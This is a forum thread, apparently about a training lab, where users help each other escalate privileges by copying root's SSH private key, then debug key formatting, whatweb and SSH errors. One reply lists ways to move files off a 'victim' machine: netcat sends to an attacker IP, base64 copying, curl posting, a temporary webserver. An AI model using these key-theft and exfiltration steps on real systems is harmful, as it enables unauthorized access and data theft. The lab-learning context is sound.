Module - Getting Started - Privilege Escalation - Second question

Hello all. I have been stuck on the following question in the getting started module for a bit and figured it is time to reach out and see if anyone can shine some light on this for me. Here is the question.

" Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’. "

Anyone that has completed this module - could you post a hint / maybe point to a section inside the module that the answer is in relation to?

I don’t know if you passed this question, but I suggest looking for ssh keys.

@elementz1 said:

I don’t know if you passed this question, but I suggest looking for ssh keys.

Any tips for the second question? I have checked the .ssh folder but I don't have permission to read the keys.

I resolved it… just enumerate the target machine and look at ssh keys

Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

ssh user@server -i /path/to/mykey

but I am unable to get in. It always asks for a password. I've tried user, user1, user2 and root as the username but no luck. Any tips are appreciated.

@NewHax said:

Hello everyone. I am still struggling a bit with this. At this point it feels like I am missing something obvious. I am able to grab the .ssh key ( I am just copy and pasting it from the target machine and into a new document on the client machine ). Once I have that I try to SSH into the same target using

ssh user@server -i /path/to/mykey

but I am unable to get in. It always asks for a password. I've tried user, user1, user2 and root as the username but no luck. Any tips are appreciated.

Before it asks for a password does it say the permissions are incorrect?

@TazWake

I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

I do receive an error that says ‘invalid format’ though.

I am running the following command

ssh user@ip_of_target -p portnumber -i /path/to/my/id_rsa

@NewHax said:

@TazWake

I do not receive an issue about permissions (I took note of the hint to chmod the id_rsa).

I do receive an error that says ‘invalid format’ though.

I am running the following command

ssh user@ip_of_target -p portnumber -i /path/to/my/id_rsa

Ok - so the first things to consider.

If the remote server is asking for a password, then your key isn’t working. If your system is asking for the password, then it is a password protected key.

So if your key isn’t working, you need to check what could be causing that.

  • try file /path/to/your/id_rsa
  • try cat /path/to/your/id_rsa to make sure it is the same file and no extra characters appeared
  • try comparing filesize and word count (wc -l) to make sure the files are identical.

@TazWake

Taz - Thank you so damn much. You not only pointed me in the right direction but gave me insight into how to view the problem to find the right solution. I was finally able to complete this with your help.

wc -l saved the day.

The issue I was having was when copy and pasting it was taking 37 lines of text and not the desired 38. I had to manually input a blank line at the end of my key to get this to 38.

Is there a more proper / accurate way to copy and paste files instead of using 'cat filename' and just highlighting and copy and pasting from the terminal?

@NewHax said:

@TazWake

Taz - Thank you so damn much.

Always glad to help.

Is there a more proper / accurate way to copy and paste files instead of using 'cat filename' and just highlighting and copy and pasting from the terminal?

The short answer is “it depends.”

You can exfiltrate files from Linux systems in a range of ways.

For example: cat filename | base64, copy the output, and on your own machine cat (paste) | base64 -d > filename, and you get a good recreation of the file.

You can also use netcat to sling the file:

  • first check the file md5sum filename
  • listener on your machine nc -nklvp 12345 > filename
  • send the data on the remote machine nc YOURIP 12345 < filename
  • wait a while, kill the listener (not the remote one as that can kill your shell)
  • check the file on your machine md5sum filename - see if it matches, if it does, win.

If you have SSH access - scp works. You can get more esoteric with curl posting the data or spinning up a temporary webserver on the victim and grabbing it that way.

Linux gives you a range of options - it often depends on what will work at the time.
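As an added example (not code from the thread or from any of the posters), the checks from the two replies above as a small shell script: it flags a pasted key that lost its trailing newline (the 37-vs-38 line symptom) and shows the base64 transfer with a checksum comparison. The file names are constructed and the sample key is a placeholder, not a real key.

```shell
#!/bin/sh
# Added example, not code from the thread. Two helpers for the problem discussed above:
# (1) check that a private key pasted from a terminal is intact; the thread's 37-vs-38
# line symptom is a dropped trailing newline, which ssh reports as "invalid format";
# (2) move a file as base64 text and confirm the checksums match.
# Assumes a POSIX sh with base64, sha256sum, wc, head, tail, grep, cut and mktemp.

# check_key_file FILE: 0 if FILE has PEM BEGIN/END markers and ends with a newline,
# 1 otherwise (printing the reason).
check_key_file() {
  f=$1
  [ -s "$f" ] || { echo "missing or empty: $f"; return 1; }
  head -n 1 "$f" | grep -q '^-----BEGIN .*PRIVATE KEY-----$' || { echo "no BEGIN line"; return 1; }
  tail -n 1 "$f" | grep -q '^-----END .*PRIVATE KEY-----$' || { echo "no END line"; return 1; }
  # wc -l counts newline bytes, so the last byte is a newline only if this prints 1.
  [ "$(tail -c 1 "$f" | wc -l | tr -d ' ')" -eq 1 ] || { echo "no trailing newline"; return 1; }
  return 0
}

# b64_roundtrip SRC DST: "base64 SRC" is what you copy from the target's terminal;
# "base64 -d" is what you run at home. Returns 0 only if DST is byte-identical to SRC.
b64_roundtrip() {
  src=$1; dst=$2
  base64 "$src" > "$dst.b64"
  base64 -d "$dst.b64" > "$dst"
  [ "$(sha256sum < "$src" | cut -d ' ' -f 1)" = "$(sha256sum < "$dst" | cut -d ' ' -f 1)" ]
}

# make_sample_key FILE: constructed placeholder with PEM framing around dummy base64
# lines; not a real key, it will not load anywhere.
make_sample_key() {
  printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
    'b3BlbnNzaC1rZXktdjEAAAAAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=' \
    'UExBQ0VIT0xERVIgTk9UIEEgUkVBTCBLRVk=' \
    '-----END OPENSSH PRIVATE KEY-----' > "$1"
}

# Demo: a terminal paste that lost the final newline is rejected; a base64 copy passes.
demo() {
  d=$(mktemp -d)
  make_sample_key "$d/id_rsa"
  printf '%s' "$(cat "$d/id_rsa")" > "$d/pasted"   # $(...) strips the trailing newline
  echo "lines: original=$(wc -l < "$d/id_rsa") pasted=$(wc -l < "$d/pasted")"
  check_key_file "$d/pasted" || echo "pasted copy rejected, as expected"
  b64_roundtrip "$d/id_rsa" "$d/via_b64" && check_key_file "$d/via_b64" && echo "base64 copy intact"
  rm -rf "$d"
}
demo
```

The same wc -l / checksum comparison works for the netcat route: take the hash on the target first, then compare after the listener has written the file.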

@TazWake You are an impressive writer, I always read your comments for more related details once I finish a problem…zzzzzzzzzzzzzz :wink:

When I am trying to go to nibbleblog through whatweb it shows "ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout" and does not load the required webpage… can anyone help?

@SPARTANone17 said:

When I am trying to go to nibbleblog through whatweb it shows "ERROR Opening: http://i.p./nibbleblog/ - Net::ReadTimeout" and does not load the required webpage… can anyone help?

What command did you use? Have you changed the error message to hide the IP, or are you passing http://i.p./nibbleblog/ as the host to whatweb?

You need to provide the real IP or hostname to whatweb; "ip" is just a placeholder. I'm also not sure that you need to provide the http:// prefix or the /nibbleblog/ suffix when using whatweb. So if the IP address of your target was 10.10.10.10, you could use the following command:

whatweb 10.10.10.10

Here is the help page for whatweb, with a usage example at the bottom: WhatWeb | Penetration Testing Tools

Let me know if you manage to get it working, best of luck!

No, I was using the IP address of the server in place of ip. I was just showing you the syntax earlier. Say the IP of the server was, for example, 10.10.10.121; then I used the command whatweb http://10.10.10.121/nibbleblog/
but that was showing an error to me…

Ah, apologies. In that case the command looks correct. Try using whatweb with a site you know to be accessible - e.g. www.google.com. If that works, it is probably worth double checking that the machine you’re running the command from is correctly connected to the VPN, and that the target machine is up.

In this specific case, you already have quite a lot of information on what technologies the target is running - you know, for example, that they are using nibbleblog.

@PoirsLJpHY
I think sometimes the Kali machine loses connection in between or something like that, because when I try to use the PWN box it works fine and I was able to clear the task easily. Or maybe there was an error on my side…

@TazWake
Since user2 had read access to root's .ssh, I copied the id_rsa from there to a folder under user2 and changed the permissions too, but whenever I try to ssh to the server as root I get a 'Connection timed out' error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here's the error. I tried all the users, i.e. user1, user2 and root; all give the same error.

@SushWannaHack said:

@TazWake
Since user2 had read access to root's .ssh, I copied the id_rsa from there to a folder under user2 and changed the permissions too, but whenever I try to ssh to the server as root I get a 'Connection timed out' error. Any idea on this?

user2@gettingstartedprivesc-145098-56f547cbb6-sx4r2:~$ ssh -p 31958 root@178.62.61.23 -i id_rsa
ssh: connect to host 178.62.61.23 port 31958: Connection timed out

Here's the error. I tried all the users, i.e. user1, user2 and root; all give the same error.

It implies there isn’t a route to 178.62.61.23 - are you sure that is the correct IP address?

The error implies a networking issue. If you are confident the IP and port are correct, it would be worth troubleshooting with traceroute and maybe even nmap.